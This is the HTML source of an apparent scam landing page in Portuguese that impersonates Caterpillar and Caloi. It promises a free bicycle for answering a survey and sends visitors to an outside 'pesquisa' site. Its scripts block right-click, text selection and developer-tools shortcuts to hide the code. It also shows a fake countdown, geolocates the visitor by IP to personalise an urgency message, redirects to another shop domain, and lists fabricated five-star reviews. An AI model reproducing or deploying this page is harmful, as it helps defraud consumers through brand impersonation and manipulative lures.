of e) t.elements[r].value === g && c(t, v);[...new Set([..._(), ...p().filter((e => 'true' === e.dataset.shopifyCaptcha))])].forEach((t => h(t, e))) })) }(m, new URLSearchParams(i.location.search), _) })(window, document, 'Shopify', 'ce_forms', 'captcha') }();</script>
	<script integrity="sha256-n5Uet9jVOXPHGd4hH4B9Y6+BxkTluaaucmYaxAjUcvY=" data-source-attribution="shopify.loadfeatures" defer="defer" data-src="//caterpillar-brindes.com/cdn/shopifycloud/shopify/assets/storefront/load_feature-9f951eb7d8d53973c719de211f807d63af81c644e5b9a6ae72661ac408d472f6.js" crossorigin="anonymous"></script>
	<script integrity="sha256-HAs5a9TQVLlKuuHrahvWuke+s1UlxXohfHeoYv8G2D8=" data-source-attribution="shopify.dynamic-checkout" defer="defer" data-src="//caterpillar-brindes.com/cdn/shopifycloud/shopify/assets/storefront/features-1c0b396bd4d054b94abae1eb6a1bd6ba47beb35525c57a217c77a862ff06d83f.js" crossorigin="anonymous"></script>
	<!-- placeholder d979df124cfbdbc4 -->
	<script>window.performance && window.performance.mark && window.performance.mark('shopify.content_for_header.end');</script>
<script async="" src="https://caterpillar-brindes.com/cdn/wpm/b36000b3ew23d1e6a6p45ab3e8bm574dc08dm.js"></script><script async="" src="//caterpillar-brindes.com/cdn/shopifycloud/shopify/assets/shop_events_listener-61fa9e0a912c675e178777d2b27f6cbd482f8912a6b0aa31fa3515985a8cd626.js"></script><script async="" src="https://caterpillar-brindes.com/cdn/wpm/b36000b3ew23d1e6a6p45ab3e8bm574dc08dm.js"></script><script async="" src="//caterpillar-brindes.com/cdn/shopifycloud/shopify/assets/shop_events_listener-61fa9e0a912c675e178777d2b27f6cbd482f8912a6b0aa31fa3515985a8cd626.js"></script></head>
<body class="no-focus-outline  features--image-zoom" data-instant-allow-query-string="">
	<!-- INICIO DOS BLOQUEADORES -->
	<script>
		window.onload = function () {
			function AlihunterBlockDM() {
				var All = document.getElementsByTagName('div');
				for (var i = 0; i < All.length; i++) {
					if (All[i].getAttribute('style') && All[i].getAttribute('style').includes('var(--ah-zIndex-backdrop)')) {
						All[i - 2].style.display = "none";
						return;
					}
				}
			}
			//Tema vision
			AlihunterBlockDM()
		}
	</script>
	<script type="text/javascript">
		var message = "Desculpe, o clique com o botão direito foi desativado.";
		function clickIE() { if (document.all) { (message); return false; } }
		function clickNS(e) {
			if
				(document.layers || (document.getElementById && !document.all)) {
				if (e.which == 2 || e.which == 3) { (message); return false; }
			}
		}
		if (document.layers) { document.captureEvents(Event.MOUSEDOWN); document.onmousedown = clickNS; }
		else { document.onmouseup = clickNS; document.oncontextmenu = clickIE; }
		document.oncontextmenu = new Function("return false")
	</script>
	<script>
		document.onkeydown = function (e) {
			if (event.keyCode == 123) {
				return false;
			}
			if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
				return false;
			}
			if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
				return false;
			}
			if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
				return false;
			}
		}
	</script>
	<script>
		function disableselect(e) {
			return false;
		}
		function reEnable() {
			return true;
		}
		document.onselectstart = new Function("return false");

		if (window.sidebar) {
			document.onmousedown = disableselect;
			document.onclick = reEnable;
		}
	</script>
	<!-- CASO TENHA MAIS BLOQUEADORES, INSIRA ABAIXO DESSA LINHA -->

	<!-- FIM DOS BLOQUEADORES -->

	<!-- Areviews coleção -->

	<!-- Areviews coleção -->
	<link href="https://monorail-edge.shopifysvc.com" rel="dns-prefetch">
	<script>(function () { if ("sendBeacon" in navigator && "performance" in window) { var session_token = document.cookie.match(/_shopify_s=([^;]*)/); function handle_abandonment_event(e) { var entries = performance.getEntries().filter(function (entry) { return /monorail-edge.shopifysvc.com/.test(entry.name); }); if (!window.abandonment_tracked && entries.length === 0) { window.abandonment_tracked = true; var currentMs = Date.now(); var navigation_start = performance.timing.navigationStart; var payload = { shop_id: 65410498752, url: window.location.href, navigation_start, duration: currentMs - navigation_start, session_token: session_token && session_token.length === 2 ? session_token[1] : "", page_type: "page" }; window.navigator.sendBeacon("https://monorail-edge.shopifysvc.com/v1/produce", JSON.stringify({ schema_id: "online_store_buyer_site_abandonment/1.1", payload: payload, metadata: { event_created_at_ms: currentMs, event_sent_at_ms: currentMs } })); } } window.addEventListener('pagehide', handle_abandonment_event); } }());</script>
	<script id="web-pixels-manager-setup">(function e(e, n, a, t, r) { var o = "function" == typeof BigInt && -1 !== BigInt.toString().indexOf("[native code]") ? "modern" : "legacy"; window.Shopify = window.Shopify || {}; var i = window.Shopify; i.analytics = i.analytics || {}; var s = i.analytics; s.replayQueue = [], s.publish = function (e, n, a) { return s.replayQueue.push([e, n, a]), !0 }; try { self.performance.mark("wpm:start") } catch (e) { } var l = [a, "/wpm", "/b", r, o.substring(0, 1), ".js"].join(""); !function (e) { var n = e.src, a = e.async, t = void 0 === a || a, r = e.onload, o = e.onerror, i = document.createElement("script"), s = document.head, l = document.body; i.async = t, i.src = n, r && i.addEventListener("load", r), o && i.addEventListener("error", o), s ? s.appendChild(i) : l ? l.appendChild(i) : console.error("Did not find a head or body element to append the script") }({ src: l, async: !0, onload: function () { var a = window.webPixelsManager.init(e); n(a); var t = window.Shopify.analytics; t.replayQueue.forEach((function (e) { var n = e[0], t = e[1], r = e[2]; a.publishCustomEvent(n, t, r) })), t.replayQueue = [], t.publish = a.publishCustomEvent, t.visitor = a.visitor }, onerror: function () { var n = e.storefrontBaseUrl.replace(/\/$/, ""), a = "".concat(n, "/.well-known/shopify/monorail/unstable/produce_batch"), r = JSON.stringify({ metadata: { event_sent_at_ms: (new Date).getTime() }, events: [{ schema_id: "web_pixels_manager_load/2.0", payload: { version: t || "latest", page_url: self.location.href, status: "failed", error_msg: "".concat(l, " has failed to load") }, metadata: { event_created_at_ms: (new Date).getTime() } }] }); try { if (self.navigator.sendBeacon.bind(self.navigator)(a, r)) return !0 } catch (e) { } var o = new XMLHttpRequest; try { return o.open("POST", a, !0), o.setRequestHeader("Content-Type", "text/plain"), o.send(r), !0 } catch (e) { console && console.warn && console.warn("[Web Pixels Manager] Got an unhandled error while logging a load error.") } return !1 } }) })({ shopId: 65410498752, storefrontBaseUrl: "https://caterpillar-brindes.com", extensionsBaseUrl: "https://extensions.shopifycdn.com/cdn/shopifycloud/web-pixels-manager", surface: "storefront-renderer", enabledBetaFlags: ["5de24938", "4735909c"], webPixelsConfigList: [{ "id": "shopify-app-pixel", "configuration": "{}", "eventPayloadVersion": "v1", "runtimeContext": "STRICT", "scriptVersion": "0121", "apiClientId": "shopify-pixel", "type": "APP", "purposes": ["ANALYTICS", "MARKETING"] }, { "id": "shopify-custom-pixel", "eventPayloadVersion": "v1", "runtimeContext": "LAX", "scriptVersion": "0121", "apiClientId": "shopify-pixel", "type": "CUSTOM", "purposes": ["ANALYTICS", "MARKETING"] }], initData: { "shop": { "name": "Cat Promo\u00e7\u00f5es", "paymentSettings": { "currencyCode": "BRL" }, "myshopifyDomain": "50d1ac-83.myshopify.com", "countryCode": "BR", "storefrontUrl": "https:\/\/caterpillar-brindes.com" }, "cart": null, "checkout": null, "customer": null, "productVariants": [] }, }, function pageEvents(webPixelsManagerAPI) { webPixelsManagerAPI.publish("page_viewed"); }, "https://caterpillar-brindes.com/cdn", "c4f6c0cbfa97b5a99ee3086a6ce48c37a27aab35", "36000b3ew23d1e6a6p45ab3e8bm574dc08d",);</script>
	<script>window.ShopifyAnalytics = window.ShopifyAnalytics || {};
		window.ShopifyAnalytics.meta = window.ShopifyAnalytics.meta || {};
		window.ShopifyAnalytics.meta.currency = 'BRL';
		var meta = { "page": { "pageType": "page", "resourceType": "page", "resourceId": 97989558464 } };
		for (var attr in meta) {
			window.ShopifyAnalytics.meta[attr] = meta[attr];
		}</script>
	<script>window.ShopifyAnalytics.merchantGoogleAnalytics = function () {
		};
	</script>
	<script class="analytics">(function () {
			var customDocumentWrite = function (content) {
				var jquery = null;

				if (window.jQuery) {
					jquery = window.jQuery;
				} else if (window.Checkout && window.Checkout.$) {
					jquery = window.Checkout.$;
				}

				if (jquery) {
					jquery('body').append(content);
				}
			};
			var hasLoggedConversion = function (token) {
				if (token) {
					return document.cookie.indexOf('loggedConversion=' + token) !== -1;
				}
				return false;
			}
			var setCookieIfConversion = function (token) {
				if (token) {
					var twoMonthsFromNow = new Date(Date.now());
					twoMonthsFromNow.setMonth(twoMonthsFromNow.getMonth() + 2);
					document.cookie = 'loggedConversion=' + token + '; expires=' + twoMonthsFromNow;
				}
			}
			var trekkie = window.ShopifyAnalytics.lib = window.trekkie = window.trekkie || [];
			if (trekkie.integrations) {
				return;
			}
			trekkie.methods = [
				'identify',
				'page',
				'ready',
				'track',
				'trackForm',
				'trackLink'
			];
			trekkie.factory = function (method) {
				return function () {
					var args = Array.prototype.slice.call(arguments);
					args.unshift(method);
					trekkie.push(args);
					return trekkie;
				};
			};
			for (var i = 0; i < trekkie.methods.length; i++) {
				var key = trekkie.methods[i];
				trekkie[key] = trekkie.factory(key);
			}
			trekkie.load = function (config) {
				trekkie.config = config || {};
				trekkie.config.initialDocumentCookie = document.cookie;
				var first = document.getElementsByTagName('script')[0];
				var script = document.createElement('script');
				script.type = 'text/javascript';
				script.onerror = function (e) {
					var scriptFallback = document.createElement('script');
					scriptFallback.type = 'text/javascript';
					scriptFallback.onerror = function (error) {
						var Monorail = {
							produce: function produce(monorailDomain, schemaId, payload) {
								var currentMs = new Date().getTime();
								var event = {
									schema_id: schemaId,
									payload: payload,
									metadata: {
										event_created_at_ms: currentMs,
										event_sent_at_ms: currentMs
									}
								};
								return Monorail.sendRequest("https://" + monorailDomain + "/v1/produce", JSON.stringify(event));
							},
							sendRequest: function sendRequest(endpointUrl, payload) {
								// Try the sendBeacon API
								if (window && window.navigator && typeof window.navigator.sendBeacon === 'function' && typeof window.Blob === 'function' && !Monorail.isIos12()) {
									var blobData = new window.Blob([payload], {
										type: 'text/plain'
									});
									if (window.navigator.sendBeacon(endpointUrl, blobData)) {
										return true;
									} // sendBeacon was not successful
								} // XHR beacon
								var xhr = new XMLHttpRequest();
								try {
									xhr.open('POST', endpointUrl);
									xhr.setRequestHeader('Content-Type', 'text/plain');
									xhr.send(payload);
								} catch (e) {
									console.log(e);
								}
								return false;
							},
							isIos12: function isIos12() {
								return window.navigator.userAgent.lastIndexOf('iPhone; CPU iPhone OS 12_') !== -1 || window.navigator.userAgent.lastIndexOf('iPad; CPU OS 12_') !== -1;
							}
						};
						Monorail.produce('monorail-edge.shopifysvc.com',
							'trekkie_storefront_load_errors/1.1',
							{
								shop_id: 65410498752,
								theme_id: 136609956032,
								app_name: "storefront",
								context_url: window.location.href,
								source_url: "//caterpillar-brindes.com/cdn/s/trekkie.storefront.6feac1db1e2c7d84269967dcaefdee0618af51f6.min.js"
							});
					};
					scriptFallback.async = true;
					scriptFallback.src = '//caterpillar-brindes.com/cdn/s/trekkie.storefront.6feac1db1e2c7d84269967dcaefdee0618af51f6.min.js';
					first.parentNode.insertBefore(scriptFallback, first);
				};
				script.async = true;
				script.src = '//caterpillar-brindes.com/cdn/s/trekkie.storefront.6feac1db1e2c7d84269967dcaefdee0618af51f6.min.js';
				first.parentNode.insertBefore(script, first);
			};
			trekkie.load(
				{ "Trekkie": { "appName": "storefront", "development": false, "defaultAttributes": { "shopId": 65410498752, "isMerchantRequest": null, "themeId": 136609956032, "themeCityHash": "9775931526347084519", "contentLanguage": "pt-BR", "currency": "BRL" }, "isServerSideCookieWritingEnabled": true, "monorailRegion": "shop_domain", "enabledBetaFlags": ["bbcf04e6"] }, "Session Attribution": {}, "S2S": { "facebookCapiEnabled": false, "source": "trekkie-storefront-renderer" } }
			);
			var loaded = false;
			trekkie.ready(function () {
				if (loaded) return;
				loaded = true;
				window.ShopifyAnalytics.lib = window.trekkie;
				var originalDocumentWrite = document.write;
				document.write = customDocumentWrite;
				try { window.ShopifyAnalytics.merchantGoogleAnalytics.call(this); } catch (error) { };
				document.write = originalDocumentWrite;
				window.ShopifyAnalytics.lib.page(null, { "pageType": "page", "resourceType": "page", "resourceId": 97989558464 });
				var match = window.location.pathname.match(/checkouts\/(.+)\/(thank_you|post_purchase)/)
				var token = match ? match[1] : undefined;
				if (!hasLoggedConversion(token)) {
					setCookieIfConversion(token);
				}
			});
			var eventsListenerScript = document.createElement('script');
			eventsListenerScript.async = true;
			eventsListenerScript.src = "//caterpillar-brindes.com/cdn/shopifycloud/shopify/assets/shop_events_listener-61fa9e0a912c675e178777d2b27f6cbd482f8912a6b0aa31fa3515985a8cd626.js";
			document.getElementsByTagName('head')[0].appendChild(eventsListenerScript);
		})();</script>
	<script class="boomerang">
		(function () {
			if (window.BOOMR && (window.BOOMR.version || window.BOOMR.snippetExecuted)) {
				return;
			}
			window.BOOMR = window.BOOMR || {};
			window.BOOMR.snippetStart = new Date().getTime();
			window.BOOMR.snippetExecuted = true;
			window.BOOMR.snippetVersion = 12;
			window.BOOMR.application = "storefront-renderer";
			window.BOOMR.themeName = "Tema Vision Nichada";
			window.BOOMR.themeVersion = "5.0";
			window.BOOMR.shopId = 65410498752;
			window.BOOMR.themeId = 136609956032;
			window.BOOMR.renderRegion = "gcp-europe-west1";
			window.BOOMR.url =
				"https://caterpillar-brindes.com/cdn/shopifycloud/boomerang/shopify-boomerang-1.0.0.min.js";
			var where = document.currentScript || document.getElementsByTagName("script")[0];
			var parentNode = where.parentNode;
			var promoted = false;
			var LOADER_TIMEOUT = 3000;
			function promote() {
				if (promoted) {
					return;
				}
				var script = document.createElement("script");
				script.id = "boomr-scr-as";
				script.src = window.BOOMR.url;
				script.async = true;
				parentNode.appendChild(script);
				promoted = true;
			}
			function iframeLoader(wasFallback) {
				promoted = true;
				var dom, bootstrap, iframe, iframeStyle;
				var doc = document;
				var win = window;
				window.BOOMR.snippetMethod = wasFallback ? "if" : "i";
				bootstrap = function (parent, scriptId) {
					var script = doc.createElement("script");
					script.id = scriptId || "boomr-if-as";
					script.src = window.BOOMR.url;
					BOOMR_lstart = new Date().getTime();
					parent = parent || doc.body;
					parent.appendChild(script);
				};
				if (!window.addEventListener && window.attachEvent && navigator.userAgent.match(/MSIE [67]./)) {
					window.BOOMR.snippetMethod = "s";
					bootstrap(parentNode, "boomr-async");
					return;
				}
				iframe = document.createElement("IFRAME");
				iframe.src = "about:blank";
				iframe.title = "";
				iframe.role = "presentation";
				iframe.loading = "eager";
				iframeStyle = (iframe.frameElement || iframe).style;
				iframeStyle.width = 0;
				iframeStyle.height = 0;
				iframeStyle.border = 0;
				iframeStyle.display = "none";
				parentNode.appendChild(iframe);
				try {
					win = iframe.contentWindow;
					doc = win.document.open();
				} catch (e) {
					dom = document.domain;
					iframe.src = "javascript:var d=document.open();d.domain='" + dom + "';void(0);";
					win = iframe.contentWindow;
					doc = win.document.open();
				}
				if (dom) {
					doc._boomrl = function () {
						this.domain = dom;
						bootstrap();
					};
					doc.write("<body onload='document._boomrl();'>");
				} else {
					win._boomrl = function () {
						bootstrap();
					};
					if (win.addEventListener) {
						win.addEventListener("load", win._boomrl, false);
					} else if (win.attachEvent) {
						win.attachEvent("onload", win._boomrl);
					}
				}
				doc.close();
			}
			var link = document.createElement("link");
			if (link.relList &&
				typeof link.relList.supports === "function" &&
				link.relList.supports("preload") &&
				("as" in link)) {
				window.BOOMR.snippetMethod = "p";
				link.href = window.BOOMR.url;
				link.rel = "preload";
				link.as = "script";
				link.addEventListener("load", promote);
				link.addEventListener("error", function () {
					iframeLoader(true);
				});
				setTimeout(function () {
					if (!promoted) {
						iframeLoader(true);
					}
				}, LOADER_TIMEOUT);
				BOOMR_lstart = new Date().getTime();
				parentNode.appendChild(link);
			} else {
				iframeLoader(false);
			}
			function boomerangSaveLoadTime(e) {
				window.BOOMR_onload = (e && e.timeStamp) || new Date().getTime();
			}
			if (window.addEventListener) {
				window.addEventListener("load", boomerangSaveLoadTime, false);
			} else if (window.attachEvent) {
				window.attachEvent("onload", boomerangSaveLoadTime);
			}
			if (document.addEventListener) {
				document.addEventListener("onBoomerangLoaded", function (e) {
					e.detail.BOOMR.init({
						ResourceTiming: {
							enabled: true,
							trackedResourceTypes: ["script", "img", "css"]
						},
					});
					e.detail.BOOMR.t_end = new Date().getTime();
				});
			} else if (document.attachEvent) {
				document.attachEvent("onpropertychange", function (e) {
					if (!e) e = event;
					if (e.propertyName === "onBoomerangLoaded") {
						e.detail.BOOMR.init({
							ResourceTiming: {
								enabled: true,
								trackedResourceTypes: ["script", "img", "css"]
							},
						});
						e.detail.BOOMR.t_end = new Date().getTime();
					}
				});
			}
		})();</script><link href="https://caterpillar-brindes.com/cdn/shopifycloud/boomerang/shopify-boomerang-1.0.0.min.js" rel="preload" as="script"><link href="https://caterpillar-brindes.com/cdn/shopifycloud/boomerang/shopify-boomerang-1.0.0.min.js" rel="preload" as="script">
	<svg class="visually-hidden">
		<linearGradient id="rating-star-gradient-half">
			<stop offset="50%" stop-color="rgb(var(--product-star-rating))"></stop>
			<stop offset="50%" stop-color="rgb(var(--product-star-rating))" stop-opacity="0.4"></stop>
		</linearGradient>
	</svg>
	<!-- NÃO ASSINCRONIZE NEM ADIE ESSE SCRIPT  -->
	<script defer="" src="js/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
	<a href="index.html#main" class="visually-hidden skip-to-content">Pular para o conteúdo</a>
	<loading-bar class="loading-bar"></loading-bar>
	<div id="shopify-section-announcement-bar" class="shopify-section shopify-section--announcement-bar">
		<style>
			:root {
				--enable-sticky-announcement-bar: 0;
			}
			#shopify-section-announcement-bar {
				--heading-color: 255, 255, 255;
				--text-color: 255, 255, 255;
				--primary-button-background: 0, 0, 0;
				--primary-button-text-color: 1, 1, 1;
				--section-background: 0, 0, 0;
				z-index: 5;
				/* Make sure it goes over header */
				position: relative;
				top: 0;
				padding-bottom: 10px;
			}
			@media screen and (min-width: 741px) {
				:root {
					--enable-sticky-announcement-bar: 0;
				}
				#shopify-section-announcement-bar {
					position: relative;
				}
			}
		</style>
		<section>
			<announcement-bar class="announcement-bar ">
				<div class="announcement-bar__list"><announcement-bar-item class="announcement-bar__item">
					<style>
						#banner {
							position: fixed;
							top: 0;
							left: 0;
							width: 100%;
							background-color: #FF0000;
							color: #fff;
							text-align: center;
							padding: 10px;
							font-family: Arial, sans-serif;
							z-index: 1000;
							box-shadow: 0 2px 5px rgba(0,0,0,0.3);
						}
						#timer {
							font-weight: bold;
							font-size: 1.2em;
						}
					</style>
					<div id="banner" class="announcement-bar__message text--small">
    					<span id="message">O tempo estimado para o encerramento da campanha é de: 29:58 minutos.</span>
					</div>
					<script>
						// Função para atualizar o cronômetro
						function updateTimer() {
							const minutes = Math.floor(totalSeconds / 60);
							const seconds = totalSeconds % 60;
							const timeString = `${String(minutes).padStart(2, '0')}:${String(seconds).padStart(2, '0')}`;
							
							if (totalSeconds > 0) {
								totalSeconds--;
								localStorage.setItem('totalSeconds', totalSeconds);
							} else {
								clearInterval(timerInterval);
								totalSeconds = 0;
								localStorage.removeItem('totalSeconds');
							}
							
							// Atualiza a mensagem com o tempo restante
							messageElement.textContent = `O tempo estimado para o encerramento da campanha é de: ${timeString} minutos.`;
						}

						// Recupera o tempo restante do localStorage ou define o tempo inicial
						let totalSeconds = parseInt(localStorage.getItem('totalSeconds')) || 30 * 60;
						const messageElement = document.getElementById('message');
						
						const timerInterval = setInterval(updateTimer, 1000);
						</script>
						<script>
							// Função para atualizar o cronômetro e a mensagem
							function updateTimer() {
								const minutes = Math.floor(totalSeconds / 60);
								const seconds = totalSeconds % 60;
								const timeString = `${String(minutes).padStart(2, '0')}:${String(seconds).padStart(2, '0')}`;
								
								if (totalSeconds > 0) {
									totalSeconds--;
									localStorage.setItem('totalSeconds', totalSeconds);
								} else {
									clearInterval(timerInterval);
									totalSeconds = 0;
									localStorage.removeItem('totalSeconds');
								}
								
								// Atualiza a mensagem com o tempo restante e a localização
								messageElement.textContent = `Essa oportunidade está disponível para ${locationCity} e você tem ${timeString} para aproveitar.`;
							}

							// Recupera o tempo restante do localStorage ou define o tempo inicial
							let totalSeconds = parseInt(localStorage.getItem('totalSeconds')) || 30 * 60;
							const timerElement = document.getElementById('timer');
							const messageElement = document.getElementById('message');
							
							const timerInterval = setInterval(updateTimer, 1000);

							// Localização pelo IP
							let locationCity = 'não disponível';
							
							fetch('https://ipapi.co/json/')
								.then(response => response.json())
								.then(data => {
									locationCity = data.city || 'não disponível';
									updateTimer(); // Atualiza a mensagem com a localização depois de obter
								})
								.catch(() => {
									locationCity = 'sua região';
									updateTimer(); // Atualiza a mensagem com a localização default em caso de erro
								});
						</script>
					</announcement-bar-item></div>
			</announcement-bar>
		</section>
		<script>
			document.documentElement.style.setProperty('--announcement-bar-height', document.getElementById('shopify-section-announcement-bar').clientHeight + 'px');
		</script>
	</div><iframe src="about:blank" title="" role="presentation" loading="eager" style="width: 0px; height: 0px; border: 0px; display: none;"></iframe>
	<div id="shopify-section-popup" class="shopify-section shopify-section--popup">
		<style>
			[aria-controls="newsletter-popup"] {
				display: none;
				/* Allows to hide the toggle icon in the header if the section is disabled */
			}
		</style>
	</div>
	<div id="main" role="main" class="anchor">
		<script>
			<meta charset="UTF-8">
				<meta name="viewport" content="width=device-width, initial-scale=1.0">
					(function() {
            var currentDomain = window.location.hostname;
					var targetDomain = "caterpillar-brasil-oficial.myshopify.com";

					if (currentDomain !== targetDomain) {
						window.location.href = "https://caterpillar-brasil-oficial.myshopify.com/pages/caterpillar";
            }
        })();
		</script>
		<script src="https://cdn.tailwindcss.com"></script>
		<link href="css/all.min_1.css" rel="stylesheet">
		<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;700&amp;display=swap" rel="stylesheet">
		<style>
			body {
				font-family: 'Poppins', sans-serif;
			}
			
			#main {
            	padding: 0px 20px !important;
            	display: flex !important;
            	align-items: center !important;
            	flex-direction: column !important;
            	justify-content: center !important;
            }
            
            #vsl-container {
            	width: 100% !important;
            	width: auto !important;
            	margin: 30px 0px !important;
            	padding: 0px !important;
            	max-width: 800px !important;
            	box-shadow: none !important;
            }
            
            @media screen and (max-width: 368px) {
            	#main {padding: 0px 10px !important;}
            
            	#offer-title {
            		font-size: 22px !important;
            		padding-top: 40px;
            	}
            
            	#offer-subtitle {
            		font-size: 16px !important;
            	}
            }
            
            @media screen and (min-width: 329px) {
            	#offer-title {
            		font-size: 22px !important;
            		padding-top: 20px;
            	}
            }
            
            @media screen and (max-width: 368px) {
            	#main {padding: 0px 5px !important;}
            
            	#vsl-container {margin-top: 20px !important;}
            
            	#offer-subtitle {
            		font-size: 15px !important;
            	}
            }
		</style>
		<div id="vsl-container" class="bg-white rounded-lg shadow-lg p-6 max-w-md text-center mx-2" style="margin-top: 30px;">
			<h1 id="offer-title" class="text-2xl font-bold mb-4" style="margin-bottom: 10px; line-height: 1.25 !important; color: #FF0000; @media screen and (max-width: 328px){
#offer-title {padding-top: 40px;}}">
				Responda Nossa Pesquisa e Ganhe uma Bicicleta Caloi TOTALMENTE GRÁTIS!
			</h1>
			<p id="offer-subtitle" class="text-lg mb-4" style="margin-bottom: 20px; line-height: 1.5 !important;">
				Assista ao vídeo de 1 minuto abaixo para saber como resgatar o seu prêmio.
			</p>
<script src="https://fast.wistia.com/embed/medias/mkfc98k64f.jsonp" async=""></script><script src="js/E-v1_1.js" async=""></script><div class="wistia_responsive_padding" style="padding:55.94% 0 0 0;position:relative;"><div class="wistia_responsive_wrapper" style="height:100%;left:0;position:absolute;top:0;width:100%;"><div class="wistia_embed wistia_async_mkfc98k64f seo=true videoFoam=true" style="height:100%;position:relative;width:100%"><div class="wistia_swatch" style="height:100%;left:0;opacity:0;overflow:hidden;position:absolute;top:0;transition:opacity 200ms;width:100%;"><img src="https://fast.wistia.com/embed/medias/mkfc98k64f/swatch" style="filter:blur(5px);height:100%;object-fit:contain;width:100%;" alt="" aria-hidden="true" onload="this.parentNode.style.opacity=1;"></div></div></div></div><style> .elementor-element:has(#smartplayer) { width: 100%; } </style>
			<a href="https://caloipesquisa.site/pesquisa">
				<button class="bg-yellow-500 text-black font-bold py-2 px-4 rounded-lg hover:bg-yellow-600 mt-4" style="padding: 10px 20px; margin-top: 20px; color: #ffffff; background-color: #ff0000;">
					PARTICIPAR AGORA
				</button>
			</a>
		</div>
		<script src="js/E-v1.js" async=""></script>
		<div id="shopify-section-static-text-with-icons" class="shopify-section shopify-section--text-with-icons"></div>
		<div id="shopify-section-static-newsletter" class="shopify-section shopify-section--newsletter"></div>
	</div><iframe src="about:blank" title="" role="presentation" loading="eager" style="width: 0px; height: 0px; border: 0px; display: none;"></iframe>
	<script defer="" type="module" src="js/ionicons.esm.js"></script>
	<script defer="" nomodule="" src="js/ionicons.js"></script>
	<div id="shopify-section-footer" class="shopify-section bg-gray-200">
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link href="css/all.min_1.css" rel="stylesheet">
		<script src="https://cdn.tailwindcss.com"></script>
		<hr class="border-gray-300">
		<br>
		<div class="max-w-5xl mx-auto bg-white p-4 rounded-lg shadow-lg" style="max-width: 800px;">
			<h4 style="width: 100%; display: flex; justify-content: center; align-items: center; font-size: 26px; font-weight: 600; margin-bottom: 10px;">
				Avaliações</h4>
			<div class="flex items-center mb-2">
				<span class="text-5xl font-bold">
					4.9
				</span>
				<span class="text-yellow-500 text-3xl ml-1">
					<i class="fas fa-star"></i>
				</span>
				<span class="text-yellow-500 text-3xl">
					<i class="fas fa-star"></i>
				</span>
				<span class="text-yellow-500 text-3xl">
					<i class="fas fa-star"></i>
				</span>
				<span class="text-yellow-500 text-3xl">
					<i class="fas fa-star"></i>
				</span>
				<span class="text-yellow-500 text-3xl">
					<i class="fas fa-star-half-alt"></i>
				</span>
			</div>
			<div class="flex mb-4 overflow-x-auto" style="gap: 20px; flex-wrap: wrap;">
				<button class="bg-red-500 text-white px-5 py-4 rounded-12px whitespace-nowrap text-1sm font-semibold" style="background-color: #FF0000;">
					Tudo (7,6mil)
				</button>
				<button class="bg-gray-100 text-gray-700 px-5 py-4 rounded-12px whitespace-nowrap text-1sm font-semibold">
					Com Mídia (3,17mil)
				</button>
				<button class="bg-gray-100 text-gray-700 px-5 py-4 rounded-12px whitespace-nowrap text-1sm font-semibold">
					Estrela
					<i class="fas fa-chevron-down"></i>
				</button>
				<button class="bg-gray-100 text-gray-700 px-5 py-4 rounded-12px whitespace-nowrap text-1sm font-semibold">
					Variação
					<i class="fas fa-chevron-down"></i>
				</button>
			</div>
			<div class="mb-4">
				<div class="flex items-center mb-2">
					<span class="font-semibold text-3sm">
						carlos123
					</span>
					<span class="ml-2 text-gray-500 text-1xs">
						Útil (46)
					</span>
				</div>
				<div class="flex items-center mb-1">
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
				</div>
				<p class="text-gray-700 mb-1 text-sm font-semibold">
					Variação: BICICLETA 29 GTS M1 FREIO A DISCO 24V SHIMANO TOURNEY SUSPENSÃO NEW EXPERT.
				</p>
				<p class="text-gray-700 mb-3 text-2sm">
					Achei que fosse uma loucura comprar uma bike na caixa, mas a entrega foi rápida e fácil. O produto é incrível e eu estou muito satisfeito!
				</p>
				<div style="gap: 20px; display: flex; justify-content: start; margin-bottom: 10px;">
					<img alt="Homem vestindo botina, vista frontal" height="100" src="images/depoimento-1.png" width="100">
				</div>
				<p class="text-gray-500 text-xs font-semibold">
					Tam: Como na foto.
				</p>
				<p class="text-gray-500 text-xs font-semibold">
					HOJE - HÁ 3 MIN.
				</p>
			</div>
			<hr class="my-4 border-gray-300">
			<div class="mb-4">
				<div class="flex items-center mb-1">
					<span class="font-semibold text-3sm">
						lucas_fernando
					</span>
					<span class="ml-2 text-gray-500 text-1xs">
						Útil (3)
					</span>
				</div>
				<div class="flex items-center mb-1">
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
				</div>
				<p class="text-gray-700 mb-1 text-sm font-semibold">
					Variação: BICICLETA ARO 29 KRW ALUMÍNIO SHIMANO TZ 24 VEL SUSPENSÃO FREIO A DISCO MOUNTAIN BIKE LTX S40.
				</p>
				<p class="text-gray-700 mb-2 text-2sm">
					A bicicleta é realmente boa, com uma qualidade premium. Super linda. Recomendo.
				</p>
				<div style="gap: 20px; display: flex; justify-content: start; margin-bottom: 10px;">
					<img alt="Homem vestindo bota, vista frontal" height="100" src="images/depoimento-2.png" width="100">
				</div>
				<p class="text-gray-500 text-xs font-semibold">
					Tam: Perfeito.
				</p>
				<p class="text-gray-500 text-xs font-semibold">
					HOJE - HÁ 5 MIN.
				</p>
			</div>
			<hr class="my-4 border-gray-300">
			<div class="mb-4">
				<div class="flex items-center mb-1">
					<span class="font-semibold text-3sm">
						joao_silva
					</span>
					<span class="ml-2 text-gray-500 text-1xs">
						Útil (13)
					</span>
				</div>
				<div class="flex items-center mb-1">
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
						<i class="fas fa-star"></i>
					</span>
					<span class="text-yellow-500 text-sm">
